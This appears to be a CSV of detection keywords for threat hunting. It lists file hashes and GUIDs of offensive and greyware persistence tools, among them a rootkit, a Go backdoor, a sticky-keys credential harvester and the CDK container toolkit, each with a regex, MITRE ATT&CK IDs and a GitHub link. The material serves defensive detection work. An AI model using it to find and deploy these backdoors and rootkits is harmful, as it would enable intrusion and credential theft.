"*233d785a077c50ad57de73da20e8696258a99edbc6961b92530dac81aede0bcb*",".{0,1000}233d785a077c50ad57de73da20e8696258a99edbc6961b92530dac81aede0bcb.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","#filehash","N/A","9","2","169","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z"
"*238111f4c27f2bad38c5b5eac85aacf4305baaa7c854911e3cbffe7a58cc9964*",".{0,1000}238111f4c27f2bad38c5b5eac85aacf4305baaa7c854911e3cbffe7a58cc9964.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","#filehash","N/A","10","4","376","68","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z"
"*242a11999f0c5b776400f2462854ef1d07101bd1085e3b29c9b7ba825c93a3fb*",".{0,1000}242a11999f0c5b776400f2462854ef1d07101bd1085e3b29c9b7ba825c93a3fb.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*24aae23bcf8b0a513988d69b1526eebd791007136a1faf08ea1df5a8d3884e50*",".{0,1000}24aae23bcf8b0a513988d69b1526eebd791007136a1faf08ea1df5a8d3884e50.{0,1000}","offensive_tool_keyword","SchTask_0x727","create hidden scheduled tasks","T1053","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/0x727/SchTask_0x727","1","0","#filehash","N/A","10","6","526","112","2021-09-01T01:34:51Z","2021-08-30T03:29:34Z"
"*2518c6ab5e78e0f644a5c406d84778eb45991564ba136c266d9696fc6996e8ef*",".{0,1000}2518c6ab5e78e0f644a5c406d84778eb45991564ba136c266d9696fc6996e8ef.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*254cf55fb776afbcf5ff93f9647303be1f8bee48bcb78f138881e4dc17c34b81*",".{0,1000}254cf55fb776afbcf5ff93f9647303be1f8bee48bcb78f138881e4dc17c34b81.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*259c9c57a74382b07c0a630b3094489b3aca263504b4fda79d3c20027e2a74fa*",".{0,1000}259c9c57a74382b07c0a630b3094489b3aca263504b4fda79d3c20027e2a74fa.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*2627fc45ff4accc08085a2e95ccaedf3ec4df6ddecb3339b747a4ca322e6d69b*",".{0,1000}2627fc45ff4accc08085a2e95ccaedf3ec4df6ddecb3339b747a4ca322e6d69b.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#filehash","N/A","4","2","104","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z"
"*2661F29C-69F5-4010-9198-A418C061DD7C*",".{0,1000}2661F29C\-69F5\-4010\-9198\-A418C061DD7C.{0,1000}","offensive_tool_keyword","Xrulez","XRulez is a Windows executable that can add malicious rules to Outlook from the command line of a compromised host.","T1078 - T1105 - T1059 - T1566","TA0002 -  TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/FSecureLABS/Xrulez","1","0","#GUIDproject","N/A","10","2","160","46","2018-12-11T16:33:08Z","2016-08-31T10:10:10Z"
"*26edf5820094951dd18e20e86b1151d7113f1e17b64f1d3817d4995885559850*",".{0,1000}26edf5820094951dd18e20e86b1151d7113f1e17b64f1d3817d4995885559850.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","0","#filehash","N/A","10","10","3922","709","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z"
"*27d7590cf6e7386f9df2777e5f2b1e3473fe990182b2ad8bf31a33b0f5436be4*",".{0,1000}27d7590cf6e7386f9df2777e5f2b1e3473fe990182b2ad8bf31a33b0f5436be4.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#filehash","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*27F85701-FD37-4D18-A107-20E914F8E779*",".{0,1000}27F85701\-FD37\-4D18\-A107\-20E914F8E779.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","#GUIDproject","N/A","10","10","370","48","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z"
"*28009247ff5f8ee93dcf3fa06e60eb43374eec61f816feb61081e2d53f4806be*",".{0,1000}28009247ff5f8ee93dcf3fa06e60eb43374eec61f816feb61081e2d53f4806be.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*28110f190791aa5b4ca3f0c36dfc39cda8716f165789599de34c8578a70357fd*",".{0,1000}28110f190791aa5b4ca3f0c36dfc39cda8716f165789599de34c8578a70357fd.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*295eb7f2a9039a3ef9552eda6ddeb1d442810621de623fd08a010514fe588d35*",".{0,1000}295eb7f2a9039a3ef9552eda6ddeb1d442810621de623fd08a010514fe588d35.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA*",".{0,1000}2963C954\-7B1E\-47F5\-B4FA\-2FC1F0D56AEA.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","#GUIDproject","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"*2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA*",".{0,1000}2963C954\-7B1E\-47F5\-B4FA\-2FC1F0D56AEA.{0,1000}","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003","N/A","N/A","Persistence","https://github.com/0xthirteen/SharpStay","1","0","#GUIDproject","N/A","10","5","462","96","2024-06-26T15:54:52Z","2020-01-24T22:22:07Z"
"*2a707260991123cf39ed723eaff4bf99db683ad35f58ad43c75c8fe2a5e9a4e7*",".{0,1000}2a707260991123cf39ed723eaff4bf99db683ad35f58ad43c75c8fe2a5e9a4e7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*2b92652d4909d39e12fc9320188f9e834b82f80d3aba92dea4267608f3543861*",".{0,1000}2b92652d4909d39e12fc9320188f9e834b82f80d3aba92dea4267608f3543861.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*2bb27f59beed6f28e048b581de811a1443aa880dc8172f3156146c4cf782b68b*",".{0,1000}2bb27f59beed6f28e048b581de811a1443aa880dc8172f3156146c4cf782b68b.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*2c757f0065c167e633318ff8d43cb85cf936eae2db224f4e066098f4a8cb324a*",".{0,1000}2c757f0065c167e633318ff8d43cb85cf936eae2db224f4e066098f4a8cb324a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*2c901d5da52c1766eb638b8d1b35a276121f0fb2a7156cb591b4f7ca054c1ed7*",".{0,1000}2c901d5da52c1766eb638b8d1b35a276121f0fb2a7156cb591b4f7ca054c1ed7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*2d65a1cab58434497155118ca19bd1202900532375a4d1356a0e60463437f924*",".{0,1000}2d65a1cab58434497155118ca19bd1202900532375a4d1356a0e60463437f924.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#filehash","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*2D6FDD44-39B1-4FF8-8AE0-60A6B0979F5F*",".{0,1000}2D6FDD44\-39B1\-4FF8\-8AE0\-60A6B0979F5F.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#GUIDproject","N/A","10","10","1715","403","2025-01-24T14:42:29Z","2017-12-17T13:04:14Z"
"*2dd16e2f18bd45ff80eb56a524d3af4e87f55054fdb3ada3d2a097824b6487ac*",".{0,1000}2dd16e2f18bd45ff80eb56a524d3af4e87f55054fdb3ada3d2a097824b6487ac.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*2e7b0f4d6b446760a2899fcc2e854850014b3ce0826291913d3d3c160ed06191*",".{0,1000}2e7b0f4d6b446760a2899fcc2e854850014b3ce0826291913d3d3c160ed06191.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z"
"*2eb30e2abc71fadaee5980bd89a8e4a2c95bcc5d60857a3c13b006c186307e8e*",".{0,1000}2eb30e2abc71fadaee5980bd89a8e4a2c95bcc5d60857a3c13b006c186307e8e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*313d2e2dad28703bf74b58c71131036e978667067d0cf77217435f10ff50a7df*",".{0,1000}313d2e2dad28703bf74b58c71131036e978667067d0cf77217435f10ff50a7df.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*317459a7d2933c3bb095b5c4d188c83ce6dbed8dd9f282cd3406c9f364a04363*",".{0,1000}317459a7d2933c3bb095b5c4d188c83ce6dbed8dd9f282cd3406c9f364a04363.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#filehash","N/A","8","10","1790","406","2025-01-19T04:49:33Z","2013-03-19T11:15:36Z"
"*31b9c5ce299981849c4ec0f90e6dac5a7b894c654eab1c3db4099744a5594e80*",".{0,1000}31b9c5ce299981849c4ec0f90e6dac5a7b894c654eab1c3db4099744a5594e80.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*32cd84b8c8e4df09df5aaf0c310a954d18b2cc96aaea2ca524b79f381afd3e55*",".{0,1000}32cd84b8c8e4df09df5aaf0c310a954d18b2cc96aaea2ca524b79f381afd3e55.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*32d12ed0ff8db1c95d1ee507561ee0db4c36200277a2bc4cd1b643e385ff5ebe*",".{0,1000}32d12ed0ff8db1c95d1ee507561ee0db4c36200277a2bc4cd1b643e385ff5ebe.{0,1000}","offensive_tool_keyword","tsh-go","Tiny SHell Go - An open-source backdoor written in Go","T1105 - T1574.006 - T1546.006 - T1053.003 - T1056.001 - T1027.009","TA0003 - TA0005 - TA0011 - TA0010","N/A","N/A","Persistence","https://github.com/CykuTW/tsh-go","1","0","#filehash","N/A","10","2","157","16","2024-08-29T02:59:37Z","2022-06-13T16:25:30Z"
"*330253612d4c4a3791acfd82257d5a4c1e68ec989e0647abfa4baa560cf0a046*",".{0,1000}330253612d4c4a3791acfd82257d5a4c1e68ec989e0647abfa4baa560cf0a046.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*336b7dca10b75274a81c04cdba1989781ad742e968ebd41e5f901e66f106204c*",".{0,1000}336b7dca10b75274a81c04cdba1989781ad742e968ebd41e5f901e66f106204c.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*347e7990aad2244990071b8b5648aeb675a7792b742ebbc08035c80c916702a4*",".{0,1000}347e7990aad2244990071b8b5648aeb675a7792b742ebbc08035c80c916702a4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*350189c879eb3d936a434927b1fa41d353d2ebdbc6589e9efa29ea5e05329fe5*",".{0,1000}350189c879eb3d936a434927b1fa41d353d2ebdbc6589e9efa29ea5e05329fe5.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*356bdd6cb7c92146fcee5812aba9eb101ff713ff67768bafd59b6f33a5d61eae*",".{0,1000}356bdd6cb7c92146fcee5812aba9eb101ff713ff67768bafd59b6f33a5d61eae.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*35a4bba030e749de8667b0284982bd8d187a5ed9e1ced0b3c2e67136aa839cc7*",".{0,1000}35a4bba030e749de8667b0284982bd8d187a5ed9e1ced0b3c2e67136aa839cc7.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*364fcacd8b55d7d54162849b620cd83e9f50ddb3c7c08478f391cce09449b452*",".{0,1000}364fcacd8b55d7d54162849b620cd83e9f50ddb3c7c08478f391cce09449b452.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*36d4c4959f8472bd2473abfc906db3c54d83ee71228c3c133d8aca97cd016d15*",".{0,1000}36d4c4959f8472bd2473abfc906db3c54d83ee71228c3c133d8aca97cd016d15.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*371226668baa95b330676a6268145ad25bfc28f59710f35fc1888aa6b70a74a4*",".{0,1000}371226668baa95b330676a6268145ad25bfc28f59710f35fc1888aa6b70a74a4.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*37bfb3819257d612a6dfed9954c9ba4a8da62f6967ec8221c802d7eb97723113*",".{0,1000}37bfb3819257d612a6dfed9954c9ba4a8da62f6967ec8221c802d7eb97723113.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*381448682cb5ea5ff1bc8bfd3462e637da0445fc74fdb60e0de5e11d8c2dc90d*",".{0,1000}381448682cb5ea5ff1bc8bfd3462e637da0445fc74fdb60e0de5e11d8c2dc90d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*3897adf59fea097e79c69c0c4fa8961b9691232f382a52b7bee3ce234028da4e*",".{0,1000}3897adf59fea097e79c69c0c4fa8961b9691232f382a52b7bee3ce234028da4e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*39f6d556d0567606d5763e60fecafeb3e5d16afd986c05602c06d2486d8d72c2*",".{0,1000}39f6d556d0567606d5763e60fecafeb3e5d16afd986c05602c06d2486d8d72c2.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*3a87a1096cb7cd4dfeb7d8725aec180b68c3aab9393f50ebf0431cc7189b6d20*",".{0,1000}3a87a1096cb7cd4dfeb7d8725aec180b68c3aab9393f50ebf0431cc7189b6d20.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*3af0857c9fae7e41683d34af7e04c6ed29439466761512ebbf28bad7561d092b*",".{0,1000}3af0857c9fae7e41683d34af7e04c6ed29439466761512ebbf28bad7561d092b.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z"
"*3b6a44069c343b15c9bafec9feb7d5597f936485c68f29316e96fe97aa15d06d*",".{0,1000}3b6a44069c343b15c9bafec9feb7d5597f936485c68f29316e96fe97aa15d06d.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","#filehash","N/A","8","1","38","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z"
"*3bd0f9a391c4fec2f65e713974067e8bdb3d99388e5f20b50c0ce867c7a5eb45*",".{0,1000}3bd0f9a391c4fec2f65e713974067e8bdb3d99388e5f20b50c0ce867c7a5eb45.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#filehash","N/A","9","4","327","45","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z"
"*3c55b7897d676bc6ec3be27026b32389107e2bba443b52f25674fdc7e4229012*",".{0,1000}3c55b7897d676bc6ec3be27026b32389107e2bba443b52f25674fdc7e4229012.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","0","#filehash","N/A","9","1","32","10","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z"
"*3ca57afb3c9a3154212ad9f9eb323ce2cae89d046e5bf05acb5730a311e4e9f3*",".{0,1000}3ca57afb3c9a3154212ad9f9eb323ce2cae89d046e5bf05acb5730a311e4e9f3.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*3D9D679D-6052-4C5E-BD91-2BC3DED09D0A*",".{0,1000}3D9D679D\-6052\-4C5E\-BD91\-2BC3DED09D0A.{0,1000}","offensive_tool_keyword","SharpSC",".NET assembly to interact with services. (included in powershell empire)","T1543.003","TA0003","N/A","N/A","Persistence","https://github.com/djhohnstein/SharpSC","1","0","#GUIDproject","N/A","8","1","38","6","2019-09-27T23:04:24Z","2019-09-24T21:05:38Z"
"*3dc271adc2565c38eda5fdaee3070bda8962159d17ba625467a0f3a6e5e440d0*",".{0,1000}3dc271adc2565c38eda5fdaee3070bda8962159d17ba625467a0f3a6e5e440d0.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*3e1e22f3efa5aa2e7da26e2e6e82468e20de8d593b748f2521cfaf78d9043a2a*",".{0,1000}3e1e22f3efa5aa2e7da26e2e6e82468e20de8d593b748f2521cfaf78d9043a2a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
"*3fc8aac43db6c83112f9bc168ae5a32f1cdd942376941341c621fa36bff26647*",".{0,1000}3fc8aac43db6c83112f9bc168ae5a32f1cdd942376941341c621fa36bff26647.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4044","555","2024-11-15T15:25:44Z","2020-11-05T09:18:51Z"
